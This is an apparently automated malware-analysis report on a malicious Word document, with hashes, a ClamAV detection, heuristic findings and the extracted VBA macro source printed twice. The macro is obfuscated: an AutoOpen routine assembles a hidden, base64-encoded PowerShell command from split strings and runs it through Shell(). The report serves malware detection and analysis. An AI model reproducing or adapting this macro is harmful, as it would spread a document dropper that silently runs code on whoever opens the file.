Office (OLE) malware analysis — malicious · 0efcccc3b203ae31

MALICIOUS

Office (OLE)

106.8 KB Created: 2018-05-30 12:52:00 Authoring application: Microsoft Office Word First seen: 2019-08-04

MD5: a3e5f141ce82fec9941989261b5d1c57 SHA-1: 8a3af29cd8704337622c12e78939d2e724d2c86c SHA-256: 0efcccc3b203ae315fbc5c19cd8b4fe1c7cfd21706c195fa75038f8b1633290f

242 Risk Score

Heuristics 7

ClamAV: Doc.Malware.Valyria-7086204-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-7086204-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12970 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12970 bytes
SHA-256: `57084f2ff5cf1015c7b1a4771797a06c2ce36705958cfe2bada0767a835cf093`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "jRdwPLBiNu" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function QjFOzMuFH() On Error Resume Next jBzli = Fix(78796 / CSng(35193) * DLWoO * Odfij) VhBn = CDate(9304) GVQBnI = Fix(47579 / CSng(54290) * PiJumB * hGqdV) VhBn = CDate(6606) QjFOzMuFH = WIGvnJZSW + IZrGPU + RVEouTFqpi + WbGNzM + AkVBGHCqw + dsJUBkjmNH + vGXjncJ + rLqcdZd + UTHzWuPHmc + QsFTE uLzBH = Fix(24278 / CSng(33240) * GTTaji * rjtjVv) VhBn = CDate(76819) End Function Sub Autoopen() On Error Resume Next UaNbzX = Fix(81139 / CSng(51725) * CGWqpG * PQfbp) VhBn = CDate(51739) hKDLhri (QjFOzMuFH) USwPJ = Fix(69965 / CSng(72708) * SGjdbu * TLQssX) VhBn = CDate(50146) End Sub Function hKDLhri(FCDzacX) On Error Resume Next tBZcU = Fix(9953 / CSng(30068) * qtOtI * IjqpVn) VhBn = CDate(29394) QVAzjzuJqI = nJNAfilZQ + Shell(hiljBwBPh + (Chr(vbKeyP)) + mfjjjfBWJw + FCDzacX + sWwPKFD, nYOjN + vbHide + rOOhDttIU) LfWiw = Fix(38560 / CSng(22201) * iouGFN * HRcDuq) VhBn = CDate(70106) End Function Attribute VB_Name = "AcUDjCCC" Function WIGvnJZSW() On Error Resume Next RVkpM = Fix(45547 / CSng(20907) * kFcFvV * wPwzJM) VhBn = CDate(47429) cmklnOKU = "owersHeLL" + " -WinDo" + "wsTyle hidden" + " -e IAAoAC" + "gAKAAi" + "AHsANwA2AH0Aew" + "AxAH0AewA1ADAAf" + "QB7ADkAMQ" + "B9AHsAO" cHVkm = Fix(90689 / CSng(68362) * EDWfzX * VPBfF) VhBn = CDate(112) SuwwUAli = "QB9AHsANwA5AH0" + "AewAyADUAfQB" + "7ADIA" + "OAB9AHsAMQA2AH0" + "AewAyADkAfQB" + "7ADYANQB9AHs" BFCPGM = Fix(82295 / CSng(64932) * otSHi * nYBBiY) VhBn = CDate(2995) NtfXtHh = "AMwAwAH0A" + "ewA4ADIAfQ" + "B7ADYAOQB9AHsAN" + "AAxAH0AewA4" + "ADUAfQB7ADQ" + "AOQB9AHsAMwA" + "2AH0AewA3AH0Aew" + "A3ADAAfQB7ADI" qvZCa = Fix(69524 / CSng(16177) * TCdFQi * oXjWo) VhBn = CDate(65460) sHckqkENNO = "ANwB9" + "AHsANwA" + "4AH0AewA4ADE" + "AfQB7ADYANgB9" iPifcd = Fix(57294 / CSng(8813) * ZzjMU * JQzGHa) VhBn = CDate(31529) dtMdwVWLk = "AHsAMwA0AH0AewA" + "0AH0AewA1AH0Ae" + "wA4AD" + "MAfQB7ADI" WIGvnJZSW = cmklnOKU + SuwwUAli + NtfXtHh + sHckqkENNO + dtMdwVWLk End Function Function IZrGPU() On Error Resume Next cZFCNd = Fix(90562 / CSng(4235) * qDRJY * IfDOhD) VhBn = CDate(11379) jamUMd = "AMwB9AHs" + "ANgAzA" + "H0Aew" + "A4ADgAfQB7ADQA" + "NgB9A" + "HsANwA0AH0Aew" + "AzAH0A" + "ewA3ADEAfQB7ADY" + "AOAB9AHs" VCGNTY = Fix(65501 / CSng(50973) * OlBGX * QaaXmp) VhBn = CDate(16957) RESjJBi = "AMQA4AH0Aew" + "A1ADgAfQ" + "B7ADA" + "AfQB7ADYAMAB9" + "AHsANQA5AH0A" + "ewAzA" YlVpb = Fix(8231 / CSng(22412) * aWpjzH * bdiQr) VhBn = CDate(4999) iuiHzUKzd = "DkAfQB7" + "ADIAN" + "gB9AHs" + "AMgA0AH" + "0AewA2ADQAfQB7A" + "DYANwB9AH" + "sANAAwAH0" + "AewA1A" WokEn = Fix(76234 / CSng(13246) * SvMzhc * jGWAfK) VhBn = CDate(59211) clPDDG = "DYAfQB7ADQANAB9" + "AHsANAA1A" + "H0AewAyAD" + "EAfQB7ADcAMgB" + "9AHsAMw" + "AxAH0AewAx" + "ADUAf" + "QB7ADMAMwB9AHsA" + "NQA1AH0AewA" IZrGPU = jamUMd + RESjJBi + iuiHzUKzd + clPDDG End Function Function RVEouTFqpi() On Error Resume Next nbIKw = Fix(89191 / CSng(15724) * RAzOj * WRYcv) VhBn = CDate(7399) CiTBSpzB = "2ADEAfQ" + "B7ADgAOQB9" + "AHsAOAA2" + "AH0AewA1ADQAfQB" + "7ADQANwB9AHsANA" + "AzAH0AewAyADIA" + "fQB7ADIAfQB" + "7ADUAMQB9AHs" + "AMwA4AH0A" WAZndu = Fix(46203 / CSng(88541) * XOrXzd * cIlKVv) VhBn = CDate(97841) YGcjTGzYpMO = "ewA0ADIAfQB7ADU" + "ANwB9AH" + "sAMQA" + "zAH0AewA" + "zADcAfQB7ADYAfQ" + "B7ADEANAB9AHsAM" + "QAyAH0Aew" + "A4ADcAf" NRijEc = Fix(5429 / CSng(29217) * XRajXU * kfadl) VhBn = CDate(43486) nriURZCFm = "QB7ADgAMAB" + "9AHsANwAzAH0A" + "ewA3ADcAfQB7AD" + "YAMgB9AHsAMw" + "AyAH0" + "AewA3" + "ADUAfQB7ADgAfQB" + "7ADEA" HtnvU = Fix(18479 / CSng(86634) * bBrZM * opOUz) VhBn = CDate(32689) BkQsQqRuVNc = "NwB9AH" + "sAMQAwAH0" + "AewA4ADQAfQB" + "7ADUAMgB9AHsAMQ" + "AxAH0AewAzADUAf" + "QB7ADIAMAB" + "9AHsANAA" RVEouTFqpi = CiTBSpzB + YGcjTGzYpMO + nriURZCFm + BkQsQqRuVNc ... (truncated)

SHA-256: 57084f2ff5cf1015c7b1a4771797a06c2ce36705958cfe2bada0767a835cf093

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "jRdwPLBiNu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function QjFOzMuFH()
On Error Resume Next
jBzli = Fix(78796 / CSng(35193) * DLWoO * Odfij)
VhBn = CDate(9304)
GVQBnI = Fix(47579 / CSng(54290) * PiJumB * hGqdV)
VhBn = CDate(6606)
QjFOzMuFH = WIGvnJZSW + IZrGPU + RVEouTFqpi + WbGNzM + AkVBGHCqw + dsJUBkjmNH + vGXjncJ + rLqcdZd + UTHzWuPHmc + QsFTE
uLzBH = Fix(24278 / CSng(33240) * GTTaji * rjtjVv)
VhBn = CDate(76819)
End Function
Sub Autoopen()
On Error Resume Next
UaNbzX = Fix(81139 / CSng(51725) * CGWqpG * PQfbp)
VhBn = CDate(51739)
hKDLhri (QjFOzMuFH)
USwPJ = Fix(69965 / CSng(72708) * SGjdbu * TLQssX)
VhBn = CDate(50146)
End Sub
Function hKDLhri(FCDzacX)
On Error Resume Next
tBZcU = Fix(9953 / CSng(30068) * qtOtI * IjqpVn)
VhBn = CDate(29394)
QVAzjzuJqI = nJNAfilZQ + Shell(hiljBwBPh + (Chr(vbKeyP)) + mfjjjfBWJw + FCDzacX + sWwPKFD, nYOjN + vbHide + rOOhDttIU)
LfWiw = Fix(38560 / CSng(22201) * iouGFN * HRcDuq)
VhBn = CDate(70106)
End Function


Attribute VB_Name = "AcUDjCCC"
Function WIGvnJZSW()
On Error Resume Next
RVkpM = Fix(45547 / CSng(20907) * kFcFvV * wPwzJM)
VhBn = CDate(47429)
cmklnOKU = "owersHeLL" + " -WinDo" + "wsTyle hidden" + " -e IAAoAC" + "gAKAAi" + "AHsANwA2AH0Aew" + "AxAH0AewA1ADAAf" + "QB7ADkAMQ" + "B9AHsAO"
cHVkm = Fix(90689 / CSng(68362) * EDWfzX * VPBfF)
VhBn = CDate(112)
SuwwUAli = "QB9AHsANwA5AH0" + "AewAyADUAfQB" + "7ADIA" + "OAB9AHsAMQA2AH0" + "AewAyADkAfQB" + "7ADYANQB9AHs"
BFCPGM = Fix(82295 / CSng(64932) * otSHi * nYBBiY)
VhBn = CDate(2995)
NtfXtHh = "AMwAwAH0A" + "ewA4ADIAfQ" + "B7ADYAOQB9AHsAN" + "AAxAH0AewA4" + "ADUAfQB7ADQ" + "AOQB9AHsAMwA" + "2AH0AewA3AH0Aew" + "A3ADAAfQB7ADI"
qvZCa = Fix(69524 / CSng(16177) * TCdFQi * oXjWo)
VhBn = CDate(65460)
sHckqkENNO = "ANwB9" + "AHsANwA" + "4AH0AewA4ADE" + "AfQB7ADYANgB9"
iPifcd = Fix(57294 / CSng(8813) * ZzjMU * JQzGHa)
VhBn = CDate(31529)
dtMdwVWLk = "AHsAMwA0AH0AewA" + "0AH0AewA1AH0Ae" + "wA4AD" + "MAfQB7ADI"
WIGvnJZSW = cmklnOKU + SuwwUAli + NtfXtHh + sHckqkENNO + dtMdwVWLk
End Function
Function IZrGPU()
On Error Resume Next
cZFCNd = Fix(90562 / CSng(4235) * qDRJY * IfDOhD)
VhBn = CDate(11379)
jamUMd = "AMwB9AHs" + "ANgAzA" + "H0Aew" + "A4ADgAfQB7ADQA" + "NgB9A" + "HsANwA0AH0Aew" + "AzAH0A" + "ewA3ADEAfQB7ADY" + "AOAB9AHs"
VCGNTY = Fix(65501 / CSng(50973) * OlBGX * QaaXmp)
VhBn = CDate(16957)
RESjJBi = "AMQA4AH0Aew" + "A1ADgAfQ" + "B7ADA" + "AfQB7ADYAMAB9" + "AHsANQA5AH0A" + "ewAzA"
YlVpb = Fix(8231 / CSng(22412) * aWpjzH * bdiQr)
VhBn = CDate(4999)
iuiHzUKzd = "DkAfQB7" + "ADIAN" + "gB9AHs" + "AMgA0AH" + "0AewA2ADQAfQB7A" + "DYANwB9AH" + "sANAAwAH0" + "AewA1A"
WokEn = Fix(76234 / CSng(13246) * SvMzhc * jGWAfK)
VhBn = CDate(59211)
clPDDG = "DYAfQB7ADQANAB9" + "AHsANAA1A" + "H0AewAyAD" + "EAfQB7ADcAMgB" + "9AHsAMw" + "AxAH0AewAx" + "ADUAf" + "QB7ADMAMwB9AHsA" + "NQA1AH0AewA"
IZrGPU = jamUMd + RESjJBi + iuiHzUKzd + clPDDG
End Function
Function RVEouTFqpi()
On Error Resume Next
nbIKw = Fix(89191 / CSng(15724) * RAzOj * WRYcv)
VhBn = CDate(7399)
CiTBSpzB = "2ADEAfQ" + "B7ADgAOQB9" + "AHsAOAA2" + "AH0AewA1ADQAfQB" + "7ADQANwB9AHsANA" + "AzAH0AewAyADIA" + "fQB7ADIAfQB" + "7ADUAMQB9AHs" + "AMwA4AH0A"
WAZndu = Fix(46203 / CSng(88541) * XOrXzd * cIlKVv)
VhBn = CDate(97841)
YGcjTGzYpMO = "ewA0ADIAfQB7ADU" + "ANwB9AH" + "sAMQA" + "zAH0AewA" + "zADcAfQB7ADYAfQ" + "B7ADEANAB9AHsAM" + "QAyAH0Aew" + "A4ADcAf"
NRijEc = Fix(5429 / CSng(29217) * XRajXU * kfadl)
VhBn = CDate(43486)
nriURZCFm = "QB7ADgAMAB" + "9AHsANwAzAH0A" + "ewA3ADcAfQB7AD" + "YAMgB9AHsAMw" + "AyAH0" + "AewA3" + "ADUAfQB7ADgAfQB" + "7ADEA"
HtnvU = Fix(18479 / CSng(86634) * bBrZM * opOUz)
VhBn = CDate(32689)
BkQsQqRuVNc = "NwB9AH" + "sAMQAwAH0" + "AewA4ADQAfQB" + "7ADUAMgB9AHsAMQ" + "AxAH0AewAzADUAf" + "QB7ADIAMAB" + "9AHsANAA"
RVEouTFqpi = CiTBSpzB + YGcjTGzYpMO + nriURZCFm + BkQsQqRuVNc
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.